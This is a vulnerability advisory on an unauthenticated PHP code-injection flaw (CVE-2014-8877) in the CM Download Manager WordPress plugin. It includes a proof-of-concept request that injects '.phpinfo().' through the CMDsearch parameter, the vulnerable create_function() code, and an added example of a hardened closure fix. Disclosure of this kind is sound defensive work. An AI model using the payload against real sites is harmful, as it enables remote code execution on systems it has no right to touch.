ITAS Team discovered a Code Injection vulnerability in CM Download Manager Plugin
ITAS Team discovered a Code Injection vulnerability in the CM Download Manager plugin (https://wordpress.org/plugins/cm-download-manager/). The vulnerability was confirmed by the vendor. A successful attack allows an anonymous (unauthenticated) attacker to run OS commands, execute arbitrary PHP code and gain full control of the application. The vulnerability exists in both the free and the pro edition. The plugin has about 36,000 downloads. If you use this plugin on your website, update to the latest version (2.0.4).
Vulnerability information:
– Vulnerability : Code injection
– Vendor : CreativeMinds (https://www.cminds.com/) – CM Download Manager Plugin
– Download link : https://wordpress.org/plugins/cm-download-manager/
– Affected version: Version 2.0.0 and possibly earlier versions
– Fix version: version 2.0.4
– Discovered by: Le Ngoc Phi – phi.n.le@itas.vn and ITAS Team
::VULNERABILITY DETAIL::
GET /cmdownloads/?CMDsearch=".phpinfo()." HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: _ga=GA1.2.1698795018.1415614778; _gat=1; PHPSESSID=okt6c51s4esif2qjq451ati7m6; cmdm_disclaimer=Y; JSB=1415614988879
Connection: keep-alive
Vulnerable file: /wp-content/plugins/cm-download-manager/lib/controllers/CmdownloadController.php
Vulnerable code (lines 130 -> 158):
public static function alterSearchQuery($search, $query)
{
    if( ( (isset($query->query_vars['post_type']) && $query->query_vars['post_type'] == CMDM_GroupDownloadPage::POST_TYPE) && (!isset($query->query_vars['widget']) || $query->query_vars['widget'] !== true) ) && !$query->is_single && !$query->is_404 && !$query->is_author && isset($_GET['CMDsearch']) )
    {
        global $wpdb;
        // user-controlled input, taken straight from the query string
        $search_term = $_GET['CMDsearch'];
        if( !empty($search_term) )
        {
            $search = '';
            $query->is_search = true;
            // added slashes screw with quote grouping when done early, so done later
            $search_term = stripslashes($search_term);
            preg_match_all('/".*?("|$)|((?<=[\r\n\t ",+])|^)[^\r\n\t ",+]+/', $search_term, $matches);
            $terms = array_map('_search_terms_tidy', $matches[0]);
            $n = '%';
            $searchand = ' AND ';
            foreach((array) $terms as $term) {
                // the SQL side is escaped ...
                $term = esc_sql(like_escape($term));
                $search .= "{$searchand}(($wpdb->posts.post_title LIKE '{$n}{$term}{$n}') OR ($wpdb->posts.post_content LIKE '{$n}{$term}{$n}'))";
            }
            // ... but the raw $search_term is concatenated into PHP source and compiled by create_function()
            add_filter('get_search_query', create_function('$q', 'return "' . $search_term . '";'), 99, 1);
            remove_filter('posts_request', 'relevanssi_prevent_default_request');
            remove_filter('the_posts', 'relevanssi_query');
        }
    }
    return $search;
}
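The root cause is the create_function() call: its second argument is compiled as PHP source, so whatever arrives in CMDsearch becomes program text. The following is an added example, not code from the advisory or from the CM Download Manager plugin, that shows the string create_function() would compile next to a closure-based replacement that treats the search term as data. The function names are chosen for this example and the input string is constructed to resemble the advisory's request parameter.

```php
<?php
// Added example (not the plugin's own code). Contrasts the create_function()
// pattern from alterSearchQuery() with a closure that captures the value.

// Builds the source text that create_function('$q', ...) would compile for a
// given search term. This helper only returns the string so the reader can see
// where the injection happens; it never compiles or runs it.
function injected_function_body($search_term) {
    return 'return "' . $search_term . '";';
}

// Hardened replacement: the closure captures $search_term as a value. No string
// is ever turned into code, so the term cannot alter what the filter does.
// create_function() is deprecated since PHP 7.2 and removed in PHP 8.0, so a
// closure is also the only portable form.
function make_search_query_filter($search_term) {
    return function ($q) use ($search_term) {
        // $q is the value passed by the 'get_search_query' filter; it is
        // replaced, just as the original filter did.
        return $search_term;
    };
}

// Constructed input: a double quote closes the string literal in the generated
// source, and the text that follows is compiled as PHP.
$term = '".phpinfo()."';

echo "Source text create_function() would compile:\n";
echo "  ", injected_function_body($term), "\n";

// The closure simply hands the same bytes back as a string.
$filter = make_search_query_filter($term);
echo "Closure returns the term as plain data:\n";
echo "  ", $filter('original query'), "\n";
```

In the first output line the quote character inside the term terminates the `"..."` literal, which is exactly why the original code executes attacker-supplied PHP. In the hardened form the term is only ever a string value; any escaping needed for display belongs at output time, not in the filter that returns the term.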
Disclosure timeline:
– 11/08/2014: Vulnerability detected
– 11/10/2014: Vendor informed
– 11/10/2014: Vendor confirmed
– 11/10/2014: Vendor released patch
– 11/14/2014: ITAS Team published information
Reference:
– https://downloadsmanager.cminds.com/release-notes/
– https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8877
– http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9215
– http://www.securityfocus.com/archive/1/534037
– http://www.exploit-db.com/exploits/35324/